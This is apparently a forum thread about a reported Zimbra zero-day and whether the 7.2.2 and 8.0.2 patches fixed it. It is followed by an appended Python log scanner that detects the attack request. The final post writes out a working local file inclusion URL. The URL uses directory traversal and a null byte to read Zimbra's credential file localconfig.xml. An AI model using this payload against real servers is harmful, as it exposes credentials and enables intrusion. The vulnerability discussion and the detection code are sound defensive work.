zimbra 0-day
It was published on Exploits Database by Offensive Security. I suppose you are aware of it; in this case, sorry.
zimbra 0-day
[quote user="maumar"]It was published on Exploits Database by Offensive Security. I suppose you are aware of it; in this case, sorry.[/QUOTE]
Please file this in bugzilla.
zimbra 0-day
If anybody's interested, I've analyzed the bug and developed an independent fix for it.
I've posted everything on my blog, which sadly is in French.
I haven't taken the time to translate all this, but if some users or people working on Zimbra want to know more about what I did, just get in touch with me
zimbra 0-day
Hi,
Thank you for sharing your research. These issues were resolved with a patch for our 7.2.2 and 8.0.2 and subsequent releases in February of 2013.
--Quanah
--
Quanah Gibson-Mount
Product Architect, Symas http://www.symas.com/
OpenLDAP Core team http://www.openldap.org/project/
zimbra 0-day
The exploit was advertised as a 0day, and I took the author's word for it.
I feel silly now, sorry about this!
zimbra 0-day
Better a false alarm than no alarm
zimbra 0-day
I updated my Zimbra to 8.0.5 but the exploit is still working. Here is a quick fix for protection, in Turkish, but I think it can help:
http://www.bilgiguvenligi.gov.tr/kritik ... iklik.html
zimbra 0-day
[quote user="anndro"]I updated my Zimbra to 8.0.5 but the exploit is still working. Here is a quick fix for protection, in Turkish, but I think it can help:[/QUOTE]
If you think this exploit still exists then file a report in bugzilla.
zimbra 0-day
Please could you post the bug here so I can subscribe to it?
Thanks
zimbra 0-day
I can confirm, LFI is working on the last 8.0.5 and after 7.2.2.
LFI is located at:
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
http://www.exploit-db.com/exploits/30085/
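Added example, not part of any post in this thread and not Zimbra's own code: a log check for the request shape reported above (a /res/*.zgz request whose skin parameter carries directory traversal or a null byte), for admins who want to see whether their server has received it. It assumes combined-format access logs; the function names, the sample lines and the client addresses are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of a combined-format access log line (the format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; client addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2013:10:00:00 +0000] "GET /res/I18nMsg,AjxMsg.js.zgz?v=091214175450&skin=carbon HTTP/1.1" 200 1234',
    '198.51.100.7 - - [10/Dec/2013:10:00:05 +0000] "GET /res/I18nMsg,AjxMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 5678',
    '198.51.100.8 - - [10/Dec/2013:10:00:09 +0000] "GET /res/ZmMsg.js.zgz?skin=%252e%252e%252f%252e%252e%252fconf HTTP/1.1" 200 90',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_skin(target):
    """Return why a /res/*.zgz request's skin value looks like file inclusion, or None."""
    parts = urlsplit(target)
    if not (parts.path.startswith("/res/") and parts.path.endswith(".zgz")):
        return None
    # parse_qs already decodes once; fully_decode handles any further layers.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("skin", []):
        skin = fully_decode(raw).replace("\\", "/")
        if "../" in skin or skin.endswith(".."):
            return "directory traversal in skin"
        if "\x00" in skin:
            return "null byte in skin"
        if skin.startswith("/"):
            return "absolute path in skin"
    return None

def scan(lines):
    """Yield (client_ip, reason) for every log line whose request is flagged."""
    for line in lines:
        m = REQUEST_RE.search(line)
        reason = suspicious_skin(m.group(1)) if m else None
        if reason:
            yield line.split(" ", 1)[0], reason

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

A hit with a 200 status on a request for localconfig.xml means the credentials stored in that file should be treated as exposed and rotated.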